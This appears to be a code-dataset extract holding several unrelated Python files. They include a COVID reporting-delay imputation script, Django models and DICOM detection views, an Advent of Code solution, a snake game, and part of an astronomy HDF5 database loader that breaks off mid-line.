astroid.extract_node(\"\"\"\n import {} as mod\n foo = mod.Foo()\n foo.should_warn\n \"\"\".format(foo_mod))\n message = make_message(node, 'Foo', 'should_warn')\n with self.assertAddsMessages(message):\n self.walk(node.root())\n","sub_path":"tests/test_proto_builder.py","file_name":"test_proto_builder.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"215099687","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Imputation Script for Production\n\n# ## Imports\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestRegressor\n\n\n# Import own code from other directory\nimport sys\n\nsys.path.append(\"../../code/imputation\")\n\nfrom imputation_methods import impute_pmm\n\n\n# ## Logging\n\nimport logging\n\nlogger = logging.getLogger(name=\"IMPUTATION\")\nlogging.basicConfig()\nlogger.setLevel(logging.INFO)\n\n\n# ## Data Loading and Preparation\n\nlogger.info(\"Loading data.\")\n\n\nfilename = \"delay_2020-05-06\"\n\n\ndelay = pd.read_pickle(f\"../../data/processed/{filename}.pl\")\nif \"id\" in delay.columns:\n delay = delay.drop(\"id\", axis=1)\n\n\n# #### Summarize all observations which do not have known or binary gender\n\ndelay.loc[\n (delay[\"gender\"] != \"male\") & (delay[\"gender\"] != \"female\"), \"gender\"\n] = \"other\"\n\n\n# #### Remove observations with negative reporting delay\n\ndelay_neg = delay[delay[\"reporting_delay_hd\"] < 0]\ndelay = delay[\n (delay[\"reporting_delay_hd\"] >= 0) | (delay[\"reporting_delay_hd\"].isnull())\n]\n\n\n# #### One-Hot Encoding (Dummy Variables)\n\nlogger.info(\"Encoding as One-Hot variables.\")\n\n\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef to_dummy(X):\n enc = OneHotEncoder(handle_unknown=\"error\", sparse=False, drop=\"first\")\n X_cat = X.select_dtypes(include=[object, \"category\"])\n X_num = X.select_dtypes(exclude=[object, \"category\"])\n X_trans = pd.DataFrame(\n enc.fit_transform(X_cat),\n columns=enc.get_feature_names(X_cat.columns),\n index=X.index,\n )\n X_dummy = pd.concat([X_num, X_trans], axis=1)\n return X_dummy, enc, X_cat.columns\n\n\ndef from_dummy(X, enc, cat_columns):\n X_trans = X[enc.get_feature_names(cat_columns)]\n X_num = X.drop(enc.get_feature_names(cat_columns), axis=1)\n X_cat = pd.DataFrame(\n enc.inverse_transform(X_trans), columns=cat_columns, index=X.index\n )\n X_res = pd.concat([X_num, X_cat], axis=1)\n return X_res\n\n\ndef to_coded(X):\n X = X.copy()\n X_cat = X.select_dtypes(include=[object, \"category\"])\n\n # define\n def map_to_int(series):\n \"\"\"Convert non-numeric features to integer codes\"\"\"\n series_cat = series.astype(\"category\")\n mapping = dict(zip(series_cat, series_cat.cat.codes))\n return series_cat.cat.codes, mapping\n\n mappings = {feat: map_to_int(X[feat])[1] for feat in X_cat.columns}\n\n # apply\n for feat, mapping in mappings.items():\n X[feat] = X[feat].replace(mapping)\n\n return X, mappings\n\n\ndelay_labels = [\n \"reporting_delay_hd\",\n \"week_report\",\n \"weekday_report\",\n \"age\",\n \"gender\",\n \"state\",\n]\ndelay_dummy, enc, enc_cats = to_dummy(delay[delay_labels])\n\n\n# ## Perform Imputation\n\nlogger.info(\"Performing imputation.\")\n\n\n# impute delay\ndelay_imputed = impute_pmm(\n delay_dummy,\n \"reporting_delay_hd\",\n regressor=RandomForestRegressor(n_estimators=10),\n k_pmm=5,\n n=3,\n)\n# round to next integer\ndelay_imputed = delay_imputed.round()\n# compute day of onset by subtracting delay from day of report\nonset_imputed = delay_imputed.apply(\n lambda x: delay.loc[delay_imputed.index, \"day_report\"] - x\n)\n\n\n# ## Factor imputed values back into original dataframe\n\nlogger.info(\"Reintegrating as delay dataframe.\")\n\n\ndef as_ordered_weekday(col):\n return col.astype(pd.CategoricalDtype(ordered=True)).cat.reorder_categories(\n [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"],\n ordered=True,\n )\n\n\n# Concat columns\ndelay_imp = delay.copy()\nfor col in onset_imputed.columns:\n delay_imp[col] = np.nan\n delay_imp.loc[onset_imputed.index, col] = onset_imputed[col]\n\n# Pivot to long format\ndelay_imp = delay_imp.melt(\n id_vars=delay_imp.drop([\"day_onset\"] + list(onset_imputed.columns), axis=1).columns,\n value_vars=[\"day_onset\"] + list(onset_imputed.columns),\n var_name=\"imputation\",\n value_name=\"day_onset\",\n)\n\n# Drop empty day onset rows\ndelay_imp = delay_imp.dropna(subset=[\"day_onset\"]).sort_values(\"day_onset\")\n\n# Compute derived values for imputed rows\ndelay_imp[\"imputation\"] = delay_imp[\"imputation\"].replace({\"day_onset\": \"original\"})\ndelay_imp[\"imputed\"] = delay_imp[\"imputation\"] != \"original\"\ndelay_imp[\"date_onset\"] = pd.to_datetime(\"2020-01-01\") + pd.to_timedelta(\n delay_imp[\"day_onset\"], unit=\"days\"\n)\ndelay_imp[\"week_onset\"] = delay_imp[\"date_onset\"].dt.week\ndelay_imp[\"weekday_onset\"] = as_ordered_weekday(delay_imp[\"date_onset\"].dt.day_name())\ndelay_imp[\"reporting_delay_hd\"] = delay_imp[\"day_report\"] - delay_imp[\"day_onset\"]\ndelay_imp[\"reporting_delay_rki\"] = delay_imp[\"day_report_rki\"] - delay_imp[\"day_onset\"]\n\n\n# ### Add observations with negative reporting delay\n\ndelay_final = pd.concat(\n [delay_imp, delay_neg.assign(imputation=\"original\", imputed=False)], sort=False\n)\n\n\n# ## Export imputed dataset\n\n# As CSV\n\nlogger.info(\"Exporting as CSV.\")\n\n\nfor imp in delay_final[\"imputation\"].unique():\n if imp != \"original\":\n delay_final.query(f\"imputation=='original' | imputation=='{imp}'\").to_csv(\n f\"../../data/processed/{filename}_{imp}.csv\", index=False\n )\n\n\n# As pickle file\n\nlogger.info(\"Exporting as pickle.\")\n\n\nfor imp in delay_final[\"imputation\"].unique():\n if imp != \"original\":\n delay_final.query(f\"imputation=='original' | imputation=='{imp}'\").to_pickle(\n f\"../../data/processed/{filename}_{imp}.pl\"\n )\n","sub_path":"code/imputation/impute.py","file_name":"impute.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"258890798","text":"import argparse \nimport Video\n\ndef MotionMeerkat(path,keep=True,vidpath=\"\",write=False):\n\n #create instance\n video_instance=Video.Video(path,vidpath=vidpath,keep=keep,write=write)\n\n #send to google for labels\n video_instance.label() \n \n #download file to play locally\n video_instance.download()\n \n #show video with annotations\n video_instance.show()\n \n #cleanup video staging file\n video_instance.cleanup()\n \n#run if called directly from command line\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-gcs_uri', help='The Google Cloud Storage URI of the video.')\n parser.add_argument('-gcs_uri', help='The local file directory to save annotated video') \n parser.add_argument('-keep', help='Should the downloaded file be kept after analysis?',action=\"store_true\") \n parser.add_argument('-write', help='Should a annotated video file be written',action=\"store_true\") \n parser.add_argument('-show', help='Show annotations within program video',action=\"store_true\") \n \n args = parser.parse_args() \n MotionMeerkat(args.gcs_uri)\n","sub_path":"MotionMeerkat/MotionMeerkat.py","file_name":"MotionMeerkat.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"632688833","text":"# Manipulate the yaml configuration file for running tests.\n\nimport subprocess\nimport yaml\nimport numpy as np\nfrom itertools import product\n\n\n# Take a yaml filename and a dictionary, and use the key-value pairs to\n# update the fields and values in the file.\ndef update(filename, changesdict):\n with open(filename) as f:\n current_dict = yaml.load(f)\n for key in changesdict:\n current_dict[key] = changesdict[key]\n with open(filename, 'w') as f:\n yaml.dump(current_dict, f)\n \n\n# Take a yaml filename and return a tuple of the keys and a tuple of\n# the values.\ndef get_tuples(filename):\n with open(filename) as f:\n d = yaml.load(f)\n keys = tuple(d.keys())\n vals = tuple(d.values())\n return keys, vals\n \n\n# First read in the metaconfig file with all the different hyperparameters\n# to be tested. Then change the config file, run train.py, and repeat.\nif __name__ == '__main__':\n keys, vals = get_tuples('metaconfig.yml')\n\n combos = list(product(*vals))\n \n for elem in combos:\n mydict = dict(zip(keys, elem))\n update('maopac_config.yml', mydict)\n subprocess.call(['python', 'maopac_test.py'])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# end\n","sub_path":"multiagent/scripts/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521898871","text":"from django.db import models\r\nfrom django.contrib.auth.models import User\r\nfrom enum import Enum, EnumMeta\r\n\r\n# Create your models here.\r\n\r\nclass deliveries(models.Model):\r\n GUSH_DAN = 'GD'\r\n RAMAT_HAGOLAN = 'RH'\r\n HASHFELA = 'HS'\r\n DAROM = 'DR'\r\n GALIL = 'GL'\r\n AREA_CHOISES = [\r\n (GUSH_DAN, 'Gush Dan'),\r\n (RAMAT_HAGOLAN, 'Ramat Hagolan'),\r\n (HASHFELA, 'Hashfela'),\r\n (DAROM, 'Darom'),\r\n (GALIL, 'Galil'),\r\n ]\r\n area = models.CharField(\r\n max_length=2,\r\n choices=AREA_CHOISES,\r\n default=GUSH_DAN,\r\n )\r\n\r\n MAIL='MA'\r\n FOOD= 'FO'\r\n FLOWERS='FL'\r\n GIFT='GF'\r\n MYSTERYBOX='MB'\r\n TYPE_CHOICES = [\r\n (MAIL,'Mail'),\r\n (FOOD,'Food'),\r\n (FLOWERS,'Flowers'),\r\n (GIFT,'Gift'),\r\n (MYSTERYBOX,'Mystery Box')\r\n ]\r\n delType = models.CharField(\r\n max_length=11,\r\n choices=TYPE_CHOICES,\r\n default=MAIL\r\n )\r\n class Status(models.IntegerChoices):\r\n i_will_take_it=0\r\n im_on_my_way = 1\r\n delivery_has_arrieved = 2\r\n finish_delivery=3\r\n status = models.IntegerField(choices=Status.choices, default=0)\r\n class Size(models.IntegerChoices):\r\n S=0\r\n M = 1\r\n L = 2\r\n size = models.IntegerField(choices=Size.choices, default=0)\r\n sender = models.ForeignKey(User,on_delete=models.CASCADE)\r\n deliveryman = models.ForeignKey( User,blank=True, null=True,on_delete=models.SET_NULL,related_name='+')\r\n description = models.CharField(max_length=256,blank=True,null=True)\r\n title = models.CharField(max_length=80)\r\n\r\n","sub_path":"final_project-proj/deliveries/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493747383","text":"import re\nwith open(\"input14.txt\") as f:\n\tinp = f.read().splitlines()\n\n\ndef parseInp(inp):\n\tdata = []\n\tfor line in inp: #mask = 11110100010101111011001X0100XX00100X mem[44304] = 31572 \n\t\tinst, value = re.split(\" = \",line)\n\t\tif inst == \"mask\":\n\t\t\tdata.append((\"mask\",value))\n\t\telse:\n\t\t\tmem = re.match(r\"mem\\[(\\d*)\\]\",inst)\n\t\t\tdata.append((int(mem.group(1)),int(value)))\n\n\treturn data\n\n\ndef value_after_bitmask(bitmask,default):\n\treturn int(\"\".join([bit if bit != \"X\" else str(default) for bit in bitmask]),2)\n\ndef decimal_to_binary(decimal):\n\treturn bin(decimal).replace(\"b\",\"\")\n\ndef real_bitmask_and_adress(bitmask,adress):\n\tbitmask = bitmask[::-1]\n\tadress = adress[:0:-1]\n\tfor index in range(len(bitmask)):\n\t\tif index == len(adress):\n\t\t\treturn bitmask[::-1]\n\t\telse:\n\t\t\tif adress[index] == \"1\" and bitmask[index] != \"X\":\n\t\t\t\tbitmask = bitmask[:index] + \"1\" + bitmask[index+1:]\n\t\t\t\t#bitmask[index] = \"1\"\n\treturn bitmask[::-1]\n\ndef get_all_adresses(adress, index = 0):\n\tlist_of_adresses = []\n\tif adress.isnumeric():\n\t\treturn [adress]\n\twhile index < len(adress):\n\t\tif adress[index] == \"X\":\n\t\t\tadress_0 = adress[: index] + \"0\" + adress[index+1:]\t\t\n\t\t\tlist_of_adresses += get_all_adresses(adress_0,index)\n\t\t\tadress_1 = adress[: index] + \"1\" + adress[index+1:]\t\t\n\t\t\tlist_of_adresses += get_all_adresses(adress_1,index)\n\t\tindex +=1\n\treturn list_of_adresses\n\n\ndef star1(inp):\n\tmemory = dict()\n\tfor inst in inp:\n\t\tif inst[0] == \"mask\":\n\t\t\tbitmask = inst[1]\n\t\telse:\n\t\t\tAND = value_after_bitmask(bitmask,1)\n\t\t\tOR = value_after_bitmask(bitmask,0)\n\t\t\tmemory[inst[0]] = inst[1] & AND | OR\n\treturn sum(memory.values())\n\n\ndef star2(inp):\n\tmemory = dict()\n\tfor inst in inp:\n\t\tif inst[0] == \"mask\":\n\t\t\tbitmask = inst[1]\t\n\t\telse:\n\t\t\treal_adress = real_bitmask_and_adress(bitmask,decimal_to_binary(inst[0]))\n\t\t\tall_adresses = get_all_adresses(real_adress)\n\t\t\tfor adress in all_adresses:\n\t\t\t\tmemory[adress] = inst[1]\n\treturn sum(memory.values())\n\n\n\n\nprint(f\"Day 14 star1 : {star1(parseInp(inp))}\")\nprint(\"Day 14 star2 : {}\".format(star2(parseInp(inp))))\n\n","sub_path":"adventcode/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"342926737","text":"import os, sys, cv2, uuid, json, glob, numpy as np, tensorflow as tf, pydicom\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom django.views.decorators.csrf import csrf_exempt\nfrom pydicom.data import get_testdata_files\nfrom datetime import datetime\nfrom modules.utils import label_map_util\nfrom modules.utils import visualization_utils as vis_util\nfrom datetime import datetime\nfrom home.model.Dicom2Png import Dicom2Png\nfrom home.model.DicomInfo import DicomInfo\nfrom home.model.DBConnect import DBConnect\nfrom home.model.DetectionBrainHemorrhage import DetectionBrainHemorrhage\nfrom home.model.ClusterVectors import ClusterVectors\nfrom annoy import AnnoyIndex\nfrom scipy import spatial\nfrom nltk import ngrams\n\ndetection = DetectionBrainHemorrhage()\n\ndef getViewTrangChu(request):\n return render(request, 'view-trang-chu-v2.html')\n\n@csrf_exempt\ndef postUpload(request):\n if request.method == 'POST':\n randomTenFile = str(uuid.uuid1())\n fileUpload = request.FILES.get('file')\n fs = FileSystemStorage()\n\n fileName = fs.save(randomTenFile, fileUpload)\n urlFile = fs.url(fileName)\n\n dicom = Dicom2Png()\n dicom.Convert(urlFile, randomTenFile)\n \n db = DBConnect()\n IDDICOM = str(uuid.uuid1())\n THOIGIAN = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n db.noneGetTable(\"INSERT INTO DICOM(IDDICOM, TENFILE, THOIGIAN) VALUES ('{0}', '{1}', '{2}')\".format(\n IDDICOM, randomTenFile, THOIGIAN\n ))\n\n return HttpResponse(randomTenFile)\n else:\n return HttpResponse(\"FILE NOT FOUND\")\n\n@csrf_exempt\ndef docThongTinFileDicom(request):\n if request.method == 'POST':\n dicom = DicomInfo()\n path = \"static/uploads/dicom/\" + request.POST.get(\"tenFile\")\n return HttpResponse(dicom.getInfoJson(path))\n else:\n return HttpResponse(\"FILE NOT FOUND\")\n\n@csrf_exempt\ndef nhanDangVungXuatHuyet(request):\n if request.method == 'POST':\n tenFile = request.POST.get(\"tenFile\")\n arrayPath = detection.Detection(\"static/uploads/images/{0}.png\".format(tenFile))\n\n # Lưu kết quả vào DB\n db = DBConnect()\n IDDICOM = db.getTable(\"SELECT IDDICOM FROM DICOM WHERE TENFILE = '{0}'\".format(tenFile))\n for item in arrayPath or []:\n db.noneGetTable(\"INSERT INTO NHANDANG(IDNHANDANG, IDDICOM, TENFILE, KETQUA, PHAMTRAM) VALUES ('{0}', '{1}', '{2}', '{3}', {4})\".format(\n str(uuid.uuid1()), IDDICOM[0][0], item[\"src\"], item[\"ketqua\"], item[\"tile\"]\n ))\n return HttpResponse(json.dumps(arrayPath)) \n\n@csrf_exempt\ndef hinhAnhLienQuan(request):\n if request.method == 'POST':\n cluster = ClusterVectors()\n ketQua = []\n tenFile = request.POST.get(\"tenFile\")\n db = DBConnect()\n for item in cluster.ClusterVector(tenFile)[1:]:\n print(item[\"similarity\"])\n data = db.getTable(\"SELECT IDDICOM FROM DICOM WHERE TENFILE = '{0}'\".format(\n item[\"filename\"]\n ))\n tmp = db.getTable(\"SELECT TENFILE, KETQUA, PHAMTRAM FROM NHANDANG WHERE IDDICOM = '{0}'\".format(\n data[0][0]\n ))\n for kq in tmp: \n ketQua.append({\n 'tenfile' : kq[0],\n 'ketQua' : kq[1],\n 'phamTram' : kq[2],\n })\n \n return HttpResponse(json.dumps(ketQua))\n else:\n return HttpResponse(\"404\")","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"139137930","text":"from neuralnetwork import *\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport os\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'True'\n\n\"\"\"\nurl_main = \"https://physics.bu.edu/~pankajm/ML-Review-Datasets/isingMC/\"\ndata_file_name = \"Ising2DFM_reSample_L40_T=All.pkl\"\nlabel_file_name = \"Ising2DFM_reSample_L40_T=All_labels.pkl\"\n\nlabels = pickle.load(urlopen(url_main + label_file_name))\n\ndata = pickle.load(urlopen(url_main + data_file_name))\ndata = np.unpackbits(data).reshape(-1, 1600)\ndata = data.astype('int')\n\nnp.save(\"labels\", labels)\nnp.save(\"spin_data\", data)\n\"\"\"\n\ny = np.load(\"labels.npy\")\nX = np.load(\"spin_data.npy\")\n\ntanh = Tanh()\nsig = Sigmoid()\nrelu = Relu()\ncrossEntropy = CrossEntropy()\n\nnp.random.seed(42)\n\nnn = NeuralNetwork([1600, 400, 100, 25, 1], [sig, sig, sig, sig], crossEntropy)\n\nidx = np.arange(len(y))\nnp.random.shuffle(idx)\n\nidx_train = idx[:10000]\nidx_test = idx[10000:11000]\n\ny_train = y[idx_train]\nX_train = X[idx_train]\ny_test = y[idx_test]\nX_test = X[idx_test]\n\nnn.train(X_train, y_train, 0.0003, 100, 100)\n\n\ny_pred = np.round(nn.predict(X_test)[:, 0]).astype(int)\nprint(y_pred[:10])\nprint(y_test[:10])\n\nsuccess = np.sum(y_pred == y_test)\nprint(success / len(y_test))\n","sub_path":"Project2/src/fit.py","file_name":"fit.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"485061292","text":"import turtle\n\nimport time\nimport random\n\n\n\nWIDTH=600\nHEIGHT=600\n\nFOOD_SIZE=10\nSQUARE_SIZE=20\nstepsize=20\ndelay=100\nscore=0\nhighscore=0\n\nsegments=[]\n\ndef move_snake():\n \n for index in range(len(segments)-1,0,-1):\n x=segments[index-1].xcor()\n y=segments[index-1].ycor()\n segments[index].goto(x,y)\n segments[index].showturtle()\n \n\n if len(segments)>0:\n x=head.xcor()\n y=head.ycor()\n segments[0].goto(x,y)\n segments[0].showturtle()\n if head.direction==\"up\":\n head.sety(head.ycor()+stepsize)\n\n elif head.direction==\"down\":\n head.sety(head.ycor()-stepsize)\n \n elif head.direction==\"left\":\n head.setx(head.xcor()-stepsize)\n \n elif head.direction==\"right\":\n head.setx(head.xcor()+stepsize)\n\ndef go_up():\n if head.direction !=\"down\":\n head.direction=\"up\"\n\ndef go_down():\n if head.direction !=\"up\":\n head.direction=\"down\"\n\ndef go_right():\n if head.direction !=\"left\":\n head.direction=\"right\"\n\ndef go_left():\n if head.direction !=\"right\":\n head.direction=\"left\"\n\n\ndef check_food():\n global score,highscore\n if head.distance(food)highscore:\n highscore=score\n pen.clear()\n pen.write(f\"Score:{score} HighScore:{highscore}\",align=\"center\", font=(\"arial\",24,\"bold\"))\n\ndef check_body_collision():\n global score\n self_collision=False\n for segment in segments:\n if segment.distance(head)WIDTH//2 or head.ycor()<-HEIGHT//2 or head.ycor()>HEIGHT//2:\n self_collision=True\n if self_collision:\n score=0\n newgame()\n\ndef play():\n move_snake()\n check_body_collision()\n check_food()\n wn.update()\n turtle.ontimer(play,delay)\n\n\ndef newgame():\n global head, food, segments, pen \n\n wn.clear()\n wn.bgcolor(\"yellow\")\n wn.listen()\n wn.onkey(go_up,\"Up\")\n wn.onkey(go_down,\"Down\")\n wn.onkey(go_right,\"Right\")\n wn.onkey(go_left,\"Left\")\n\n\n head=turtle.Turtle()\n head.speed(0)\n head.shape(\"square\")\n head.color(\"black\")\n head.penup()\n head.goto(0,0)\n head.direction=\"up\"\n\n food=turtle.Turtle()\n food.speed(0)\n food.shape(\"triangle\")\n food.color(\"red\")\n food.penup()\n food.shapesize(FOOD_SIZE/SQUARE_SIZE)\n food.goto(100,100)\n\n segments=[]\n \n\n\n\nwn=turtle.Screen()\nwn.title(\"Snake Game\")\n\nwn.setup(WIDTH,HEIGHT)\nnewgame()\n\npen=turtle.Turtle()\npen.speed(0)\npen.shape(\"square\")\npen.color(\"black\")\npen.penup()\npen.hideturtle()\npen.goto(0,260)\npen.write(\"Score:0 HighScore: 0\",align=\"center\", font=(\"arial\",24,\"bold\"))\n\n\n\nplay()\n\nturtle.done()\n","sub_path":"snake_game_begginner.py","file_name":"snake_game_begginner.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161402639","text":"#\n# (c) UWA, The University of Western Australia\n# M468/35 Stirling Hwy\n# Perth WA 6009\n# Australia\n#\n# Copyright by UWA, 2012-2015\n# All rights reserved\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston,\n# MA 02111-1307 USA\n#\n\"\"\"\nLoad data from the HDF5 files into the database\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport h5py\nimport math\nimport numpy\nimport time\nfrom sqlalchemy import create_engine, select, func\nfrom common import get_table_sed, get_galaxy_file_name, pidfile_exists, get_table_original, add_step_done_id, get_step_done_ids\nfrom configuration import DB_LOGIN\nfrom constants import OUTPUT_FORMAT_1_03, MAX_X_Y_BLOCK, BUCKET_NAME, QUEUE_LOAD_DATABASE, FILTERS, FAST_DISK, STEP_DONE_ID_ORIGINAL_VALUES, STEP_DONE_ID_SED_DATA, STEP_DONE_ID_NO_HDF5_FILE\nfrom database.tables import PARAMETER_STATISTIC, build_dynamic_tables, GALAXY, MASK, MASK_POINT\nfrom helpers.logging_helper import get_logger\nfrom helpers.s3_helper import S3Helper\nfrom helpers.sqs_helper import SqsHelper\n\nLOG = get_logger(__name__)\nLOG.debug('PYTHONPATH = {0}'.format(sys.path))\n\nPATH_TO_PIDFILE = FAST_DISK + '/load_database.pid'\n\n\ndef get_data_required_original(steps_done):\n # Get all the data\n data_required = []\n\n # have we marked this as missing the HDF5 file\n if [STEP_DONE_ID_NO_HDF5_FILE, None, None] in steps_done:\n return data_required\n\n for filter_name in FILTERS:\n step_done = [STEP_DONE_ID_ORIGINAL_VALUES, filter_name, None]\n if step_done not in steps_done:\n data_required.append(filter_name)\n\n return data_required\n\n\ndef get_data_required_sed(connection, steps_done):\n \"\"\"\n Get a list of the sed data required\n \"\"\"\n # Get all the data\n data_required = []\n # have we marked this as missing the HDF5 file\n if [STEP_DONE_ID_NO_HDF5_FILE, None, None] in steps_done:\n return data_required\n\n for pair in connection.execute(select([PARAMETER_STATISTIC])):\n parameter_id = pair[PARAMETER_STATISTIC.c.parameter_id]\n statistic_id = pair[PARAMETER_STATISTIC.c.statistic_id]\n\n step_done = [STEP_DONE_ID_SED_DATA, parameter_id, statistic_id]\n if step_done not in steps_done:\n data_required.append([parameter_id, statistic_id])\n\n data_required.sort(key=lambda x: (x[0], x[1]))\n\n return data_required\n\n\ndef get_chunks(dimension):\n \"\"\"\n Break the dimension up into chunks\n :param dimension:\n :return: a list with the number of chunks\n\n >>> get_chunks(1)\n [0]\n >>> get_chunks(10)\n [0]\n >>> get_chunks(1023)\n [0]\n >>> get_chunks(1024)\n [0]\n >>> get_chunks(1025)\n [0, 1]\n >>> get_chunks(2047)\n [0, 1]\n >>> get_chunks(2048)\n [0, 1]\n >>> get_chunks(2049)\n [0, 1, 2]\n\n \"\"\"\n return range(((dimension - 1) / MAX_X_Y_BLOCK) + 1)\n\n\ndef get_size(block, dimension):\n \"\"\"\n How big is this axis\n :param block:\n :param dimension:\n :return:\n\n >>> get_size(0, 50)\n 50\n >>> get_size(0, 1024)\n 1024\n >>> get_size(0, 2244)\n 1024\n >>> get_size(1, 2244)\n 1024\n >>> get_size(2, 2244)\n 196\n \"\"\"\n elements = get_chunks(dimension)\n if len(elements) == 1:\n return dimension\n elif block < len(elements) - 1:\n return MAX_X_Y_BLOCK\n\n return dimension - (block * MAX_X_Y_BLOCK)\n\n\ndef get_layer(filter_name, pixel_data):\n x, y, z = pixel_data.shape\n for (name, value) in pixel_data.attrs.items():\n if filter_name == name:\n # Some times the number of layers is wrong. The number of filters from the runid does not match the\n # actual ones in the SED file. The pixel_data attributes work from the SED file so use that\n if int(value) < z:\n return int(value)\n\n return -1\n\n\ndef insert_original_data(connection, filter_name, pixel_group, output_format, dimension_x, dimension_y, galaxy_id):\n table = get_table_original(filter_name)\n\n # Add the new data\n LOG.info('Adding data to table: original_value__{0}, galaxy_id: {1}'.format(filter_name.lower(), galaxy_id))\n insert_data = []\n start_time = time.time()\n layer = -1\n\n if output_format == OUTPUT_FORMAT_1_03:\n # If we only have one block then quickly copy it\n if dimension_x <= MAX_X_Y_BLOCK and dimension_y <= MAX_X_Y_BLOCK:\n pixel_data = pixel_group['pixel_filters_0_0']\n layer = get_layer(filter_name, pixel_data)\n if layer >= 0:\n data = pixel_data[:, :, layer]\n for x in range(dimension_x):\n for y in range(dimension_y):\n value = data[x, y]\n if value[0] != 0.0 or value[1] != 0.0 or value[2] != 0.0:\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x,\n \"y\": y,\n \"value\": numpy.asscalar(value[0]),\n \"sigma\": numpy.asscalar(value[1]),\n \"flux_bfm\": numpy.asscalar(value[2])\n }\n )\n\n else:\n for block_x in get_chunks(dimension_x):\n for block_y in get_chunks(dimension_y):\n pixel_data = pixel_group['pixel_filters_{0}_{1}'.format(block_x, block_y)]\n layer = get_layer(filter_name, pixel_data)\n\n # Some times the number of layers is wrong\n if layer >= 0:\n size_x = get_size(block_x, dimension_x)\n size_y = get_size(block_y, dimension_y)\n\n x_offset = block_x * MAX_X_Y_BLOCK\n y_offset = block_y * MAX_X_Y_BLOCK\n\n # Copy the block back\n data = pixel_data[:, :, layer]\n for x in range(size_x):\n for y in range(size_y):\n value = data[x, y]\n if value[0] != 0.0 or value[1] != 0.0 or value[2] != 0.0:\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x + x_offset,\n \"y\": y + y_offset,\n \"value\": numpy.asscalar(value[0]),\n \"sigma\": numpy.asscalar(value[1]),\n \"flux_bfm\": numpy.asscalar(value[2])\n }\n )\n\n else:\n if 'pixel_filters' in pixel_group.keys():\n pixel_data = pixel_group['pixel_filters']\n layer = get_layer(filter_name, pixel_data)\n if layer >= 0:\n data = pixel_data[:, :, layer]\n for x in range(dimension_x):\n for y in range(dimension_y):\n value = data[x, y]\n if value[0] != 0.0 or value[1] != 0.0 or value[2] != 0.0:\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x,\n \"y\": y,\n \"value\": numpy.asscalar(value[0]),\n \"sigma\": numpy.asscalar(value[1]),\n \"flux_bfm\": numpy.asscalar(value[2])\n }\n )\n\n # Bulk insert the data\n database_start = time.time()\n if len(insert_data) > 0:\n connection.execute(table.insert(), insert_data)\n\n total_time = -1\n if layer >= 0:\n end_time = time.time()\n database_time = end_time - database_start\n total_time = end_time - start_time\n LOG.info(\n 'insert_sed_data, table: {0}, galaxy_id: {1}, total_time: {2:.3f}s, database_time: {3:.3f}s, inserts: {4}'.format(\n table,\n galaxy_id,\n total_time,\n database_time,\n len(insert_data)\n )\n )\n\n return total_time\n\n\ndef insert_sed_data(connection, pair, pixel_group, output_format, dimension_x, dimension_y, galaxy_id):\n \"\"\"\n Get the data from the hdf5 file and put it into the database\n \"\"\"\n parameter_id = pair[0]\n statistic_id = pair[1]\n table = get_table_sed(parameter_id, statistic_id)\n\n # Add the new data\n LOG.info('insert_sed_data, table: {0}, galaxy_id: {1}'.format(table, galaxy_id))\n stored_count = 0\n insert_data = []\n start_time = time.time()\n\n if output_format == OUTPUT_FORMAT_1_03:\n # If we only have one block then quickly copy it\n if dimension_x <= MAX_X_Y_BLOCK and dimension_y <= MAX_X_Y_BLOCK:\n pixel_data = pixel_group['pixels_0_0']\n data = pixel_data[:, :, parameter_id, statistic_id]\n for x in range(dimension_x):\n for y in range(dimension_y):\n value = data[x, y]\n if not math.isnan(value):\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x,\n \"y\": y,\n \"value\": numpy.asscalar(value)\n }\n )\n stored_count += 1\n\n else:\n for block_x in 